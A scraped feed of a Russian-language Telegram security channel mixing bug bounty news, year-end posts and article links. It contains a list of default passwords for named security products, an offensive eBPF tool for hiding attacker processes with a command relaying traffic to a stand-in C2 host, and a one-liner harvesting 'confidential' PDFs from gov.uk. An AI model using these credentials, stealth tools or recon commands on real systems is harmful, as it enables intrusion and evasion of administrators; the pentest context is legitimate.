Forwarded from PRO:PENTEST
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17 2⚡1
Forwarded from BI.ZONE Bug Bounty
Мы думали-думали, что же такое особенное подарить нашей десятке лучших... А потом как придумали! На двух загадочных фото в посте — подсказка ;)
А это список самых крутых багхантеров на нашей платформе в 2023 году:
Хотим сказать спасибо всем, кто упорно багхантил на платформе весь год и поддерживал нас.
А всех из десятки от души поздравляем, в ближайшее время свяжемся и отправим подарки.
Stay tuned!
UPD
arkiix влетел в рейтинг уже после подведения итогов, так что наш топ-10 магией Деда Мороза превратился в топ-11. Так держать!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤🔥1🎄1 1
E-mail Injection; Инъекции в почтовую функциональность веб-приложений
Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;
Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.
👉 Сохраняй
🌚 @poxek
Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;
Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.
Please open Telegram to view this post
VIEW IN TELEGRAM
GIGANEWS. Главные события 2023 года по версии «Хакера»
Год подходит к концу, некоторые уже начинают резать салаты, а значит, пришло время оглянуться назад и вспомнить самые важные, интересные и забавные события, которыми он нам запомнится. По традиции мы составили для тебя подборку наиболее ярких взломов, атак, уязвимостей, фейлов и других событий уходящего 2023 года. Будет интересно, погнали!
В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года
👉 Очень советую прочитать тем, кто особо не следил за ИБ новостями.
🌚 @poxek
Год подходит к концу, некоторые уже начинают резать салаты, а значит, пришло время оглянуться назад и вспомнить самые важные, интересные и забавные события, которыми он нам запомнится. По традиции мы составили для тебя подборку наиболее ярких взломов, атак, уязвимостей, фейлов и других событий уходящего 2023 года. Будет интересно, погнали!
В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года
Please open Telegram to view this post
VIEW IN TELEGRAM
Не ну вы поняли)
Новые программы для тех, кто не собирается отдыхать на новогодние праздники
🌚 @poxek
Новые программы для тех, кто не собирается отдыхать на новогодние праздники
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Android Security & Malware
Android Deep Links exploitation
https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4
https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4
Medium
Android Deep Links exploitation
Recently, I have been studying Android penetration testing, and I came across a new topic called ‘Deep Links’. Since it is a new topic to…
В следующем году постарается сделать как минимум х1.5, а то и больше!!
А также +3.5к подписчиков на канале, то бишь канал за этот год вырос в более чем 2 раза. Всем спасибо, что вы были этот год со мной. Следующий год обещает быть ещё более взрывным!!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤25❤🔥8🔥4 3👏1
Похек
Меня тут поправили. Не в 2 раза канал вырос, а в 6 раз практически 😁
☃14 4🎄3 1
Новые партнёрства, постараюсь выступать почаще (если буду успевать готовить темы), прогрессивный рост канала, улучшение контента: постараюсь делать контент одновременно для начинающих ребят и для тех, кто уже разбираются.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤25 7🔥6🎄4❤🔥2 2⚡1
Всех поздравляю с Новым Годом!!
🌲 🌲 🌲 🌚 🌚 🌚 💰 💰 🎁 🎁
Please open Telegram to view this post
VIEW IN TELEGRAM
❤39🔥10☃6🎄4 1
Forwarded from true_security
на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:
Докидывайте дефолтные пароли сзи в комментах)
Так сказать, спасибо за дефолтные пароли:
- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222
- maxpatrol VM: Administrator:P@ssw0rd
- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd
- pt xdr: Administrator:P@ssw0rd
- pt nad: administrator:P0sitive или administrator:Administr@t0r
- security vision soar: postgres postgres:1q2w#E$R
- kuma (kaspersky siem): admin:mustB3Ch@ng3d!
Докидывайте дефолтные пароли сзи в комментах)
🔥12 2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤38🔥13🎉8❤🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Установка:
Использование:
👉 https://github.com/eeriedusk/nysm
🌚 @poxek
Скрытый контейнер для постэксплуатации
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.
Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make
Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12 3 3😎1
Forwarded from SHADOW:Group
Исследуя таргет часто попадается много pdf'ок, которые могут содержать конфиденциальные данные. Просматривать вручную все это очень долго, а потому можно попробовать автоматизировать этот процесс.
.pdf с помощью Grep.sudo apt install poppler-utils
internal use only" или "confidential" и т.д.В результате чего получим такую команду:
for i in $(echo "gov.uk" | gau --subs --threads 16 | grep -E -o 'https?://[^[:space:]]+\.pdf' | httpx -silent -mc 200); do if curl -k -s $i | pdftotext -q - - | grep -Eaiq 'confidential|internal use only'; then echo $i | tee output.txt; fi; done
Эта команда сканирует веб-сайт "
gov.uk" и его поддомены в поиске URL-ов с PDF-файлами. Затем она проверяет каждый PDF-файл на наличие строк "confidential" или "internal use only" и записывает эти URL-ы в файл "output.txt".Вы можете включить свое творческое мышление и попытаться изменить этот скрипт по своему усмотрению. Например, используя katana вместо gau или проверяя наличие других чувствительных слов, используя другие расширения и т.д. Использование собственного творческого подхода даст вам максимальную отдачу!
#web #recon #leak
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21 4❤2
This media is not supported in your browser
VIEW IN TELEGRAM
🔵 Галопом по Европам: Легитимные процессы Windows на пальцах
#windows
Статья-памятка - быстро и понятно о легитимных процессах Windows: какой процесс за что отвечает, какие нормальные свойства имеют процессы, и заправка в виде небольшого количества краткой, но полезной информации.
Подойдет всем - и тем, кто боится страшных букв в Диспетчере задач, и тем, кому просто интересно, что за что отвечает, и для чего это все нужно.
⚡️ https://habr.com/en/articles/784960/
🌚 @poxek
#windows
Статья-памятка - быстро и понятно о легитимных процессах Windows: какой процесс за что отвечает, какие нормальные свойства имеют процессы, и заправка в виде небольшого количества краткой, но полезной информации.
Подойдет всем - и тем, кто боится страшных букв в Диспетчере задач, и тем, кому просто интересно, что за что отвечает, и для чего это все нужно.
Статья за авторством @exc3pt10n
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13 6❤🔥2 2
Top 10 web hacking techniques of 2023 - конкурс открыт
#portswigger
За последний год множество исследователей в области безопасности поделились своими ресерчами с сообществом в виде записей в блогах, презентаций и технических статей.
Однако из-за огромного объема хорошие статьи могут быть упущены из виду и быстро забыты. Поэтому с 2006 года сообщество ежегодно объединяется для отбора самых интересных работ.
Подача заявок:
Чтобы подать заявку, просто укажите ссылку на исследование и, по желанию, краткий комментарий, объясняющий, что нового в этой работе.
❤️ Подать заявку на номинацию
Ниже указал актуальный список статей, которые уже отобрали для оценки в номинацию:
- Ransacking your password reset tokens
mTLS: When certificate authentication is done wrong
- Smashing the state machine: the true potential of web race conditions
- Bypass firewalls with of-CORs and typo-squatting
- RCE via LDAP truncation on hg.mozilla.org
- Cookie Bugs - Smuggling & Injection
- OAuth 2.0 Redirect URI Validation Falls Short, Literally
- Prototype Pollution in Python - Abdulrah33m's Blog
- Pretalx Vulnerabilities: How to get accepted at every conference
- From Akamai to F5 to NTLM... with love.
- Сan I speak to your manager? hacking root EPP servers to take control of zones
- Blind CSS Exfiltration: exfiltrate unknown web pages
- Compromising F5 BIGIP with Request Smuggling
- Server-side prototype pollution: Black-box detection without the DoS
- Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari
- HTML Over the Wire
- SMTP Smuggling - Spoofing E-Mails Worldwide
- DOM-based race condition: racing in the browser for fun
- Metamask Snaps: Playing in the Sand
- CVE-2022-4908: SOP bypass in Chrome using Navigation API
- Code Vulnerabilities Put Proton Mails at Risk
🌚 @poxek
#portswigger
За последний год множество исследователей в области безопасности поделились своими ресерчами с сообществом в виде записей в блогах, презентаций и технических статей.
Однако из-за огромного объема хорошие статьи могут быть упущены из виду и быстро забыты. Поэтому с 2006 года сообщество ежегодно объединяется для отбора самых интересных работ.
Подача заявок:
Чтобы подать заявку, просто укажите ссылку на исследование и, по желанию, краткий комментарий, объясняющий, что нового в этой работе.
Ниже указал актуальный список статей, которые уже отобрали для оценки в номинацию:
- Ransacking your password reset tokens
mTLS: When certificate authentication is done wrong
- Smashing the state machine: the true potential of web race conditions
- Bypass firewalls with of-CORs and typo-squatting
- RCE via LDAP truncation on hg.mozilla.org
- Cookie Bugs - Smuggling & Injection
- OAuth 2.0 Redirect URI Validation Falls Short, Literally
- Prototype Pollution in Python - Abdulrah33m's Blog
- Pretalx Vulnerabilities: How to get accepted at every conference
- From Akamai to F5 to NTLM... with love.
- Сan I speak to your manager? hacking root EPP servers to take control of zones
- Blind CSS Exfiltration: exfiltrate unknown web pages
- Compromising F5 BIGIP with Request Smuggling
- Server-side prototype pollution: Black-box detection without the DoS
- Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari
- HTML Over the Wire
- SMTP Smuggling - Spoofing E-Mails Worldwide
- DOM-based race condition: racing in the browser for fun
- Metamask Snaps: Playing in the Sand
- CVE-2022-4908: SOP bypass in Chrome using Navigation API
- Code Vulnerabilities Put Proton Mails at Risk
Моё лично мнение, что список очень интересный и в нашем комьюнити могут найтись те специалисты, которые захотят или заинтересуются отправкой своих работ в эту номинацию.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16 2
Forwarded from wr3dmast3r vs pentest
Многие оставляют недоработанными вектора атак с self-XSS или XSS, заблокированной CSP. Иногда стоит уделить достаточно внимания каждой такой находке и посмотреть на уязвимость с другой стороны 😈
В этой статье мы рассмотрим различные методы и техники, которые расширяют границы XSS-атак: эксплуатацию XSS через service-worker, self-XSS в один клик и другие сочетания уязвимостей💎
https://telegra.ph/XSS-Advanced-Level-01-09
В этой статье мы рассмотрим различные методы и техники, которые расширяют границы XSS-атак: эксплуатацию XSS через service-worker, self-XSS в один клик и другие сочетания уязвимостей
https://telegra.ph/XSS-Advanced-Level-01-09
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
XSS Advanced Level
Я часто встречаю XSS, которые не дают возможности использовать что-то кроме вызова алерта, или какие-нибудь Self-XSS без возможности эксплуатации. Однако, если приложить достаточно усилий, то можно докрутить даже многие Self-XSS, используя их в комбинации…
❤🔥11⚡4😈2 2
Потратился на праздниках? Самое время начать багхантить!
Если кто не заметил, в конце года на Standoff появилось пять новых программ с выплатами до 1 млн рублей. И многие из них закроются уже в конце января.
🔜 Но если начать ломать прямо сейчас, есть все шансы получить максимальное баунти (а за некоторые криты дают даже ящик фирменного «Блэк Хета» от Standoff 365 в качестве приятного бонуса).
Если кто не заметил, в конце года на Standoff появилось пять новых программ с выплатами до 1 млн рублей. И многие из них закроются уже в конце января.
Please open Telegram to view this post
VIEW IN TELEGRAM
👏9